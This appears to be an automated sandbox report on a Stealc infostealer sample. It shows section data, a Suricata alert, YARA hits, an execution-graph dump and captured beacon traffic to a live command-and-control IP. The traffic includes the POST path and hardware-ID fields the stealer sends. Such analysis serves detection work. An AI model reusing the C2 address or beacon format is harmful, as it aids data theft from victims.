IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(blank) | 0x1000 | 0x25b000 | 0x22800 | eae3c5b3d99fc278228f0942a3ae9954 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(blank) | 0x25e000 | 0x29e000 | 0x200 | 40dd42ee6ff97d4b3a317f9f7bd2c5b6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fbyhctql | 0x4fc000 | 0x19c000 | 0x19be00 | e79e501c87e5c5dc44cfbc9f247b2c6a | False | 0.9949639605462822 | data | 7.95281216056825 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dwaepsqc | 0x698000 | 0x1000 | 0x400 | 1eb0e82ce0abaee49ec08cc1672a1459 | False | 0.7822265625 | data | 6.128902526364697 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x699000 | 0x3000 | 0x2200 | 84d4efb7d1305e2a85c7a07a22434fbe | False | 0.3968290441176471 | DOS executable (COM) | 4.178052787252471 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T08:40:14.705683+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 08:40:13.777677059 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
Sep 27, 2024 08:40:13.782623053 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
Sep 27, 2024 08:40:13.782707930 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
Sep 27, 2024 08:40:13.783364058 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
Sep 27, 2024 08:40:13.788244009 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
Sep 27, 2024 08:40:14.473900080 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
Sep 27, 2024 08:40:14.473967075 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
Sep 27, 2024 08:40:14.483140945 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
Sep 27, 2024 08:40:14.487984896 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
Sep 27, 2024 08:40:14.704139948 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
Sep 27, 2024 08:40:14.705682993 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
Sep 27, 2024 08:40:17.664391041 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 08:40:31.431972980 CEST | 53 | 65156 | 1.1.1.1 | 192.168.2.6
                • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | 1524 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 08:40:13.783364058 CEST | 89 | OUT | GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Sep 27, 2024 08:40:14.473900080 CEST | 203 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 06:40:14 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Sep 27, 2024 08:40:14.483140945 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGI
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 43 39 34 30 34 33 46 36 39 30 31 39 34 32 37 37 39 37 33 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 2d 2d 0d 0a
Data Ascii (line breaks restored from the CRLF bytes above):
------BFIIIDAFBFBKECBGDBGI
Content-Disposition: form-data; name="hwid"

66C94043F6901942779736
------BFIIIDAFBFBKECBGDBGI
Content-Disposition: form-data; name="build"

save
------BFIIIDAFBFBKECBGDBGI--
Sep 27, 2024 08:40:14.704139948 CEST | 210 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 06:40:14 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=
                Target ID:0
                Start time:02:40:08
                Start date:27/09/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x2a0000
                File size:1'843'200 bytes
                MD5 hash:DB555E4FDC380E9E8A19FCC609F7D1AA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2223713103.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2182199807.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true


                  Execution Graph

                  Execution Coverage:7.8%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:9.7%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:24
API calls 14071->14072 14073 2a2ca9 14072->14073 14074 2a45c0 2 API calls 14073->14074 14075 2a2cc2 14074->14075 14076 2a45c0 2 API calls 14075->14076 14077 2a2cdb 14076->14077 14078 2a45c0 2 API calls 14077->14078 14079 2a2cf4 14078->14079 14080 2a45c0 2 API calls 14079->14080 14081 2a2d0d 14080->14081 14082 2a45c0 2 API calls 14081->14082 14083 2a2d26 14082->14083 14084 2a45c0 2 API calls 14083->14084 14085 2a2d3f 14084->14085 14086 2a45c0 2 API calls 14085->14086 14087 2a2d58 14086->14087 14088 2a45c0 2 API calls 14087->14088 14089 2a2d71 14088->14089 14090 2a45c0 2 API calls 14089->14090 14091 2a2d8a 14090->14091 14092 2a45c0 2 API calls 14091->14092 14093 2a2da3 14092->14093 14094 2a45c0 2 API calls 14093->14094 14095 2a2dbc 14094->14095 14096 2a45c0 2 API calls 14095->14096 14097 2a2dd5 14096->14097 14098 2a45c0 2 API calls 14097->14098 14099 2a2dee 14098->14099 14100 2a45c0 2 API calls 14099->14100 14101 2a2e07 14100->14101 14102 2a45c0 2 API calls 14101->14102 14103 2a2e20 14102->14103 14104 2a45c0 2 API calls 14103->14104 14105 2a2e39 14104->14105 14106 2a45c0 2 API calls 14105->14106 14107 2a2e52 14106->14107 14108 2a45c0 2 API calls 14107->14108 14109 2a2e6b 14108->14109 14110 2a45c0 2 API calls 14109->14110 14111 2a2e84 14110->14111 14112 2a45c0 2 API calls 14111->14112 14113 2a2e9d 14112->14113 14114 2a45c0 2 API calls 14113->14114 14115 2a2eb6 14114->14115 14116 2a45c0 2 API calls 14115->14116 14117 2a2ecf 14116->14117 14118 2a45c0 2 API calls 14117->14118 14119 2a2ee8 14118->14119 14120 2a45c0 2 API calls 14119->14120 14121 2a2f01 14120->14121 14122 2a45c0 2 API calls 14121->14122 14123 2a2f1a 14122->14123 14124 2a45c0 2 API calls 14123->14124 14125 2a2f33 14124->14125 14126 2a45c0 2 API calls 14125->14126 14127 2a2f4c 14126->14127 14128 2a45c0 2 API calls 14127->14128 14129 2a2f65 14128->14129 14130 2a45c0 2 API calls 14129->14130 14131 2a2f7e 14130->14131 14132 2a45c0 2 API calls 14131->14132 14133 2a2f97 14132->14133 14134 2a45c0 2 API calls 
14133->14134 14135 2a2fb0 14134->14135 14136 2a45c0 2 API calls 14135->14136 14137 2a2fc9 14136->14137 14138 2a45c0 2 API calls 14137->14138 14139 2a2fe2 14138->14139 14140 2a45c0 2 API calls 14139->14140 14141 2a2ffb 14140->14141 14142 2a45c0 2 API calls 14141->14142 14143 2a3014 14142->14143 14144 2a45c0 2 API calls 14143->14144 14145 2a302d 14144->14145 14146 2a45c0 2 API calls 14145->14146 14147 2a3046 14146->14147 14148 2a45c0 2 API calls 14147->14148 14149 2a305f 14148->14149 14150 2a45c0 2 API calls 14149->14150 14151 2a3078 14150->14151 14152 2a45c0 2 API calls 14151->14152 14153 2a3091 14152->14153 14154 2a45c0 2 API calls 14153->14154 14155 2a30aa 14154->14155 14156 2a45c0 2 API calls 14155->14156 14157 2a30c3 14156->14157 14158 2a45c0 2 API calls 14157->14158 14159 2a30dc 14158->14159 14160 2a45c0 2 API calls 14159->14160 14161 2a30f5 14160->14161 14162 2a45c0 2 API calls 14161->14162 14163 2a310e 14162->14163 14164 2a45c0 2 API calls 14163->14164 14165 2a3127 14164->14165 14166 2a45c0 2 API calls 14165->14166 14167 2a3140 14166->14167 14168 2a45c0 2 API calls 14167->14168 14169 2a3159 14168->14169 14170 2a45c0 2 API calls 14169->14170 14171 2a3172 14170->14171 14172 2a45c0 2 API calls 14171->14172 14173 2a318b 14172->14173 14174 2a45c0 2 API calls 14173->14174 14175 2a31a4 14174->14175 14176 2a45c0 2 API calls 14175->14176 14177 2a31bd 14176->14177 14178 2a45c0 2 API calls 14177->14178 14179 2a31d6 14178->14179 14180 2a45c0 2 API calls 14179->14180 14181 2a31ef 14180->14181 14182 2a45c0 2 API calls 14181->14182 14183 2a3208 14182->14183 14184 2a45c0 2 API calls 14183->14184 14185 2a3221 14184->14185 14186 2a45c0 2 API calls 14185->14186 14187 2a323a 14186->14187 14188 2a45c0 2 API calls 14187->14188 14189 2a3253 14188->14189 14190 2a45c0 2 API calls 14189->14190 14191 2a326c 14190->14191 14192 2a45c0 2 API calls 14191->14192 14193 2a3285 14192->14193 14194 2a45c0 2 API calls 14193->14194 14195 2a329e 14194->14195 14196 2a45c0 2 API calls 14195->14196 
14197 2a32b7 14196->14197 14198 2a45c0 2 API calls 14197->14198 14199 2a32d0 14198->14199 14200 2a45c0 2 API calls 14199->14200 14201 2a32e9 14200->14201 14202 2a45c0 2 API calls 14201->14202 14203 2a3302 14202->14203 14204 2a45c0 2 API calls 14203->14204 14205 2a331b 14204->14205 14206 2a45c0 2 API calls 14205->14206 14207 2a3334 14206->14207 14208 2a45c0 2 API calls 14207->14208 14209 2a334d 14208->14209 14210 2a45c0 2 API calls 14209->14210 14211 2a3366 14210->14211 14212 2a45c0 2 API calls 14211->14212 14213 2a337f 14212->14213 14214 2a45c0 2 API calls 14213->14214 14215 2a3398 14214->14215 14216 2a45c0 2 API calls 14215->14216 14217 2a33b1 14216->14217 14218 2a45c0 2 API calls 14217->14218 14219 2a33ca 14218->14219 14220 2a45c0 2 API calls 14219->14220 14221 2a33e3 14220->14221 14222 2a45c0 2 API calls 14221->14222 14223 2a33fc 14222->14223 14224 2a45c0 2 API calls 14223->14224 14225 2a3415 14224->14225 14226 2a45c0 2 API calls 14225->14226 14227 2a342e 14226->14227 14228 2a45c0 2 API calls 14227->14228 14229 2a3447 14228->14229 14230 2a45c0 2 API calls 14229->14230 14231 2a3460 14230->14231 14232 2a45c0 2 API calls 14231->14232 14233 2a3479 14232->14233 14234 2a45c0 2 API calls 14233->14234 14235 2a3492 14234->14235 14236 2a45c0 2 API calls 14235->14236 14237 2a34ab 14236->14237 14238 2a45c0 2 API calls 14237->14238 14239 2a34c4 14238->14239 14240 2a45c0 2 API calls 14239->14240 14241 2a34dd 14240->14241 14242 2a45c0 2 API calls 14241->14242 14243 2a34f6 14242->14243 14244 2a45c0 2 API calls 14243->14244 14245 2a350f 14244->14245 14246 2a45c0 2 API calls 14245->14246 14247 2a3528 14246->14247 14248 2a45c0 2 API calls 14247->14248 14249 2a3541 14248->14249 14250 2a45c0 2 API calls 14249->14250 14251 2a355a 14250->14251 14252 2a45c0 2 API calls 14251->14252 14253 2a3573 14252->14253 14254 2a45c0 2 API calls 14253->14254 14255 2a358c 14254->14255 14256 2a45c0 2 API calls 14255->14256 14257 2a35a5 14256->14257 14258 2a45c0 2 API calls 14257->14258 14259 2a35be 
14258->14259 14260 2a45c0 2 API calls 14259->14260 14261 2a35d7 14260->14261 14262 2a45c0 2 API calls 14261->14262 14263 2a35f0 14262->14263 14264 2a45c0 2 API calls 14263->14264 14265 2a3609 14264->14265 14266 2a45c0 2 API calls 14265->14266 14267 2a3622 14266->14267 14268 2a45c0 2 API calls 14267->14268 14269 2a363b 14268->14269 14270 2a45c0 2 API calls 14269->14270 14271 2a3654 14270->14271 14272 2a45c0 2 API calls 14271->14272 14273 2a366d 14272->14273 14274 2a45c0 2 API calls 14273->14274 14275 2a3686 14274->14275 14276 2a45c0 2 API calls 14275->14276 14277 2a369f 14276->14277 14278 2a45c0 2 API calls 14277->14278 14279 2a36b8 14278->14279 14280 2a45c0 2 API calls 14279->14280 14281 2a36d1 14280->14281 14282 2a45c0 2 API calls 14281->14282 14283 2a36ea 14282->14283 14284 2a45c0 2 API calls 14283->14284 14285 2a3703 14284->14285 14286 2a45c0 2 API calls 14285->14286 14287 2a371c 14286->14287 14288 2a45c0 2 API calls 14287->14288 14289 2a3735 14288->14289 14290 2a45c0 2 API calls 14289->14290 14291 2a374e 14290->14291 14292 2a45c0 2 API calls 14291->14292 14293 2a3767 14292->14293 14294 2a45c0 2 API calls 14293->14294 14295 2a3780 14294->14295 14296 2a45c0 2 API calls 14295->14296 14297 2a3799 14296->14297 14298 2a45c0 2 API calls 14297->14298 14299 2a37b2 14298->14299 14300 2a45c0 2 API calls 14299->14300 14301 2a37cb 14300->14301 14302 2a45c0 2 API calls 14301->14302 14303 2a37e4 14302->14303 14304 2a45c0 2 API calls 14303->14304 14305 2a37fd 14304->14305 14306 2a45c0 2 API calls 14305->14306 14307 2a3816 14306->14307 14308 2a45c0 2 API calls 14307->14308 14309 2a382f 14308->14309 14310 2a45c0 2 API calls 14309->14310 14311 2a3848 14310->14311 14312 2a45c0 2 API calls 14311->14312 14313 2a3861 14312->14313 14314 2a45c0 2 API calls 14313->14314 14315 2a387a 14314->14315 14316 2a45c0 2 API calls 14315->14316 14317 2a3893 14316->14317 14318 2a45c0 2 API calls 14317->14318 14319 2a38ac 14318->14319 14320 2a45c0 2 API calls 14319->14320 14321 2a38c5 14320->14321 
14322 2a45c0 2 API calls 14321->14322 14323 2a38de 14322->14323 14324 2a45c0 2 API calls 14323->14324 14325 2a38f7 14324->14325 14326 2a45c0 2 API calls 14325->14326 14327 2a3910 14326->14327 14328 2a45c0 2 API calls 14327->14328 14329 2a3929 14328->14329 14330 2a45c0 2 API calls 14329->14330 14331 2a3942 14330->14331 14332 2a45c0 2 API calls 14331->14332 14333 2a395b 14332->14333 14334 2a45c0 2 API calls 14333->14334 14335 2a3974 14334->14335 14336 2a45c0 2 API calls 14335->14336 14337 2a398d 14336->14337 14338 2a45c0 2 API calls 14337->14338 14339 2a39a6 14338->14339 14340 2a45c0 2 API calls 14339->14340 14341 2a39bf 14340->14341 14342 2a45c0 2 API calls 14341->14342 14343 2a39d8 14342->14343 14344 2a45c0 2 API calls 14343->14344 14345 2a39f1 14344->14345 14346 2a45c0 2 API calls 14345->14346 14347 2a3a0a 14346->14347 14348 2a45c0 2 API calls 14347->14348 14349 2a3a23 14348->14349 14350 2a45c0 2 API calls 14349->14350 14351 2a3a3c 14350->14351 14352 2a45c0 2 API calls 14351->14352 14353 2a3a55 14352->14353 14354 2a45c0 2 API calls 14353->14354 14355 2a3a6e 14354->14355 14356 2a45c0 2 API calls 14355->14356 14357 2a3a87 14356->14357 14358 2a45c0 2 API calls 14357->14358 14359 2a3aa0 14358->14359 14360 2a45c0 2 API calls 14359->14360 14361 2a3ab9 14360->14361 14362 2a45c0 2 API calls 14361->14362 14363 2a3ad2 14362->14363 14364 2a45c0 2 API calls 14363->14364 14365 2a3aeb 14364->14365 14366 2a45c0 2 API calls 14365->14366 14367 2a3b04 14366->14367 14368 2a45c0 2 API calls 14367->14368 14369 2a3b1d 14368->14369 14370 2a45c0 2 API calls 14369->14370 14371 2a3b36 14370->14371 14372 2a45c0 2 API calls 14371->14372 14373 2a3b4f 14372->14373 14374 2a45c0 2 API calls 14373->14374 14375 2a3b68 14374->14375 14376 2a45c0 2 API calls 14375->14376 14377 2a3b81 14376->14377 14378 2a45c0 2 API calls 14377->14378 14379 2a3b9a 14378->14379 14380 2a45c0 2 API calls 14379->14380 14381 2a3bb3 14380->14381 14382 2a45c0 2 API calls 14381->14382 14383 2a3bcc 14382->14383 14384 2a45c0 2 
API calls 14383->14384 14385 2a3be5 14384->14385 14386 2a45c0 2 API calls 14385->14386 14387 2a3bfe 14386->14387 14388 2a45c0 2 API calls 14387->14388 14389 2a3c17 14388->14389 14390 2a45c0 2 API calls 14389->14390 14391 2a3c30 14390->14391 14392 2a45c0 2 API calls 14391->14392 14393 2a3c49 14392->14393 14394 2a45c0 2 API calls 14393->14394 14395 2a3c62 14394->14395 14396 2a45c0 2 API calls 14395->14396 14397 2a3c7b 14396->14397 14398 2a45c0 2 API calls 14397->14398 14399 2a3c94 14398->14399 14400 2a45c0 2 API calls 14399->14400 14401 2a3cad 14400->14401 14402 2a45c0 2 API calls 14401->14402 14403 2a3cc6 14402->14403 14404 2a45c0 2 API calls 14403->14404 14405 2a3cdf 14404->14405 14406 2a45c0 2 API calls 14405->14406 14407 2a3cf8 14406->14407 14408 2a45c0 2 API calls 14407->14408 14409 2a3d11 14408->14409 14410 2a45c0 2 API calls 14409->14410 14411 2a3d2a 14410->14411 14412 2a45c0 2 API calls 14411->14412 14413 2a3d43 14412->14413 14414 2a45c0 2 API calls 14413->14414 14415 2a3d5c 14414->14415 14416 2a45c0 2 API calls 14415->14416 14417 2a3d75 14416->14417 14418 2a45c0 2 API calls 14417->14418 14419 2a3d8e 14418->14419 14420 2a45c0 2 API calls 14419->14420 14421 2a3da7 14420->14421 14422 2a45c0 2 API calls 14421->14422 14423 2a3dc0 14422->14423 14424 2a45c0 2 API calls 14423->14424 14425 2a3dd9 14424->14425 14426 2a45c0 2 API calls 14425->14426 14427 2a3df2 14426->14427 14428 2a45c0 2 API calls 14427->14428 14429 2a3e0b 14428->14429 14430 2a45c0 2 API calls 14429->14430 14431 2a3e24 14430->14431 14432 2a45c0 2 API calls 14431->14432 14433 2a3e3d 14432->14433 14434 2a45c0 2 API calls 14433->14434 14435 2a3e56 14434->14435 14436 2a45c0 2 API calls 14435->14436 14437 2a3e6f 14436->14437 14438 2a45c0 2 API calls 14437->14438 14439 2a3e88 14438->14439 14440 2a45c0 2 API calls 14439->14440 14441 2a3ea1 14440->14441 14442 2a45c0 2 API calls 14441->14442 14443 2a3eba 14442->14443 14444 2a45c0 2 API calls 14443->14444 14445 2a3ed3 14444->14445 14446 2a45c0 2 API calls 
14445->14446 14447 2a3eec 14446->14447 14448 2a45c0 2 API calls 14447->14448 14449 2a3f05 14448->14449 14450 2a45c0 2 API calls 14449->14450 14451 2a3f1e 14450->14451 14452 2a45c0 2 API calls 14451->14452 14453 2a3f37 14452->14453 14454 2a45c0 2 API calls 14453->14454 14455 2a3f50 14454->14455 14456 2a45c0 2 API calls 14455->14456 14457 2a3f69 14456->14457 14458 2a45c0 2 API calls 14457->14458 14459 2a3f82 14458->14459 14460 2a45c0 2 API calls 14459->14460 14461 2a3f9b 14460->14461 14462 2a45c0 2 API calls 14461->14462 14463 2a3fb4 14462->14463 14464 2a45c0 2 API calls 14463->14464 14465 2a3fcd 14464->14465 14466 2a45c0 2 API calls 14465->14466 14467 2a3fe6 14466->14467 14468 2a45c0 2 API calls 14467->14468 14469 2a3fff 14468->14469 14470 2a45c0 2 API calls 14469->14470 14471 2a4018 14470->14471 14472 2a45c0 2 API calls 14471->14472 14473 2a4031 14472->14473 14474 2a45c0 2 API calls 14473->14474 14475 2a404a 14474->14475 14476 2a45c0 2 API calls 14475->14476 14477 2a4063 14476->14477 14478 2a45c0 2 API calls 14477->14478 14479 2a407c 14478->14479 14480 2a45c0 2 API calls 14479->14480 14481 2a4095 14480->14481 14482 2a45c0 2 API calls 14481->14482 14483 2a40ae 14482->14483 14484 2a45c0 2 API calls 14483->14484 14485 2a40c7 14484->14485 14486 2a45c0 2 API calls 14485->14486 14487 2a40e0 14486->14487 14488 2a45c0 2 API calls 14487->14488 14489 2a40f9 14488->14489 14490 2a45c0 2 API calls 14489->14490 14491 2a4112 14490->14491 14492 2a45c0 2 API calls 14491->14492 14493 2a412b 14492->14493 14494 2a45c0 2 API calls 14493->14494 14495 2a4144 14494->14495 14496 2a45c0 2 API calls 14495->14496 14497 2a415d 14496->14497 14498 2a45c0 2 API calls 14497->14498 14499 2a4176 14498->14499 14500 2a45c0 2 API calls 14499->14500 14501 2a418f 14500->14501 14502 2a45c0 2 API calls 14501->14502 14503 2a41a8 14502->14503 14504 2a45c0 2 API calls 14503->14504 14505 2a41c1 14504->14505 14506 2a45c0 2 API calls 14505->14506 14507 2a41da 14506->14507 14508 2a45c0 2 API calls 14507->14508 
14509 2a41f3 14508->14509 14510 2a45c0 2 API calls 14509->14510 14511 2a420c 14510->14511 14512 2a45c0 2 API calls 14511->14512 14513 2a4225 14512->14513 14514 2a45c0 2 API calls 14513->14514 14515 2a423e 14514->14515 14516 2a45c0 2 API calls 14515->14516 14517 2a4257 14516->14517 14518 2a45c0 2 API calls 14517->14518 14519 2a4270 14518->14519 14520 2a45c0 2 API calls 14519->14520 14521 2a4289 14520->14521 14522 2a45c0 2 API calls 14521->14522 14523 2a42a2 14522->14523 14524 2a45c0 2 API calls 14523->14524 14525 2a42bb 14524->14525 14526 2a45c0 2 API calls 14525->14526 14527 2a42d4 14526->14527 14528 2a45c0 2 API calls 14527->14528 14529 2a42ed 14528->14529 14530 2a45c0 2 API calls 14529->14530 14531 2a4306 14530->14531 14532 2a45c0 2 API calls 14531->14532 14533 2a431f 14532->14533 14534 2a45c0 2 API calls 14533->14534 14535 2a4338 14534->14535 14536 2a45c0 2 API calls 14535->14536 14537 2a4351 14536->14537 14538 2a45c0 2 API calls 14537->14538 14539 2a436a 14538->14539 14540 2a45c0 2 API calls 14539->14540 14541 2a4383 14540->14541 14542 2a45c0 2 API calls 14541->14542 14543 2a439c 14542->14543 14544 2a45c0 2 API calls 14543->14544 14545 2a43b5 14544->14545 14546 2a45c0 2 API calls 14545->14546 14547 2a43ce 14546->14547 14548 2a45c0 2 API calls 14547->14548 14549 2a43e7 14548->14549 14550 2a45c0 2 API calls 14549->14550 14551 2a4400 14550->14551 14552 2a45c0 2 API calls 14551->14552 14553 2a4419 14552->14553 14554 2a45c0 2 API calls 14553->14554 14555 2a4432 14554->14555 14556 2a45c0 2 API calls 14555->14556 14557 2a444b 14556->14557 14558 2a45c0 2 API calls 14557->14558 14559 2a4464 14558->14559 14560 2a45c0 2 API calls 14559->14560 14561 2a447d 14560->14561 14562 2a45c0 2 API calls 14561->14562 14563 2a4496 14562->14563 14564 2a45c0 2 API calls 14563->14564 14565 2a44af 14564->14565 14566 2a45c0 2 API calls 14565->14566 14567 2a44c8 14566->14567 14568 2a45c0 2 API calls 14567->14568 14569 2a44e1 14568->14569 14570 2a45c0 2 API calls 14569->14570 14571 2a44fa 
14570->14571 14572 2a45c0 2 API calls 14571->14572 14573 2a4513 14572->14573 14574 2a45c0 2 API calls 14573->14574 14575 2a452c 14574->14575 14576 2a45c0 2 API calls 14575->14576 14577 2a4545 14576->14577 14578 2a45c0 2 API calls 14577->14578 14579 2a455e 14578->14579 14580 2a45c0 2 API calls 14579->14580 14581 2a4577 14580->14581 14582 2a45c0 2 API calls 14581->14582 14583 2a4590 14582->14583 14584 2a45c0 2 API calls 14583->14584 14585 2a45a9 14584->14585 14586 2b9c10 14585->14586 14587 2b9c20 43 API calls 14586->14587 14588 2ba036 8 API calls 14586->14588 14587->14588 14589 2ba0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14588->14589 14590 2ba146 14588->14590 14589->14590 14591 2ba153 8 API calls 14590->14591 14592 2ba216 14590->14592 14591->14592 14593 2ba298 14592->14593 14594 2ba21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14592->14594 14595 2ba337 14593->14595 14596 2ba2a5 6 API calls 14593->14596 14594->14593 14597 2ba41f 14595->14597 14598 2ba344 9 API calls 14595->14598 14596->14595 14599 2ba428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14597->14599 14600 2ba4a2 14597->14600 14598->14597 14599->14600 14601 2ba4ab GetProcAddress GetProcAddress 14600->14601 14602 2ba4dc 14600->14602 14601->14602 14603 2ba515 14602->14603 14604 2ba4e5 GetProcAddress GetProcAddress 14602->14604 14605 2ba612 14603->14605 14606 2ba522 10 API calls 14603->14606 14604->14603 14607 2ba61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14605->14607 14608 2ba67d 14605->14608 14606->14605 14607->14608 14609 2ba69e 14608->14609 14610 2ba686 GetProcAddress 14608->14610 14611 2b5ca3 14609->14611 14612 2ba6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14609->14612 14610->14609 14613 2a1590 14611->14613 14612->14611 15734 2a1670 14613->15734 14616 2ba7a0 lstrcpy 14617 2a15b5 14616->14617 14618 2ba7a0 lstrcpy 14617->14618 14619 2a15c7 14618->14619 14620 2ba7a0 
lstrcpy 14619->14620 14621 2a15d9 14620->14621 14622 2ba7a0 lstrcpy 14621->14622 14623 2a1663 14622->14623 14624 2b5510 14623->14624 14625 2b5521 14624->14625 14626 2ba820 2 API calls 14625->14626 14627 2b552e 14626->14627 14628 2ba820 2 API calls 14627->14628 14629 2b553b 14628->14629 14630 2ba820 2 API calls 14629->14630 14631 2b5548 14630->14631 14632 2ba740 lstrcpy 14631->14632 14633 2b5555 14632->14633 14634 2ba740 lstrcpy 14633->14634 14635 2b5562 14634->14635 14636 2ba740 lstrcpy 14635->14636 14637 2b556f 14636->14637 14638 2ba740 lstrcpy 14637->14638 14675 2b557c 14638->14675 14639 2b5643 StrCmpCA 14639->14675 14640 2b56a0 StrCmpCA 14641 2b57dc 14640->14641 14640->14675 14642 2ba8a0 lstrcpy 14641->14642 14644 2b57e8 14642->14644 14643 2a1590 lstrcpy 14643->14675 14646 2ba820 2 API calls 14644->14646 14645 2ba820 lstrlen lstrcpy 14645->14675 14647 2b57f6 14646->14647 14651 2ba820 2 API calls 14647->14651 14648 2b5856 StrCmpCA 14649 2b5991 14648->14649 14648->14675 14652 2ba8a0 lstrcpy 14649->14652 14650 2ba7a0 lstrcpy 14650->14675 14653 2b5805 14651->14653 14654 2b599d 14652->14654 14655 2a1670 lstrcpy 14653->14655 14657 2ba820 2 API calls 14654->14657 14674 2b5811 14655->14674 14656 2ba740 lstrcpy 14656->14675 14659 2b59ab 14657->14659 14658 2b5a0b StrCmpCA 14660 2b5a28 14658->14660 14661 2b5a16 Sleep 14658->14661 14662 2ba820 2 API calls 14659->14662 14663 2ba8a0 lstrcpy 14660->14663 14661->14675 14664 2b59ba 14662->14664 14666 2b5a34 14663->14666 14665 2a1670 lstrcpy 14664->14665 14665->14674 14667 2ba820 2 API calls 14666->14667 14668 2b5a43 14667->14668 14670 2ba820 2 API calls 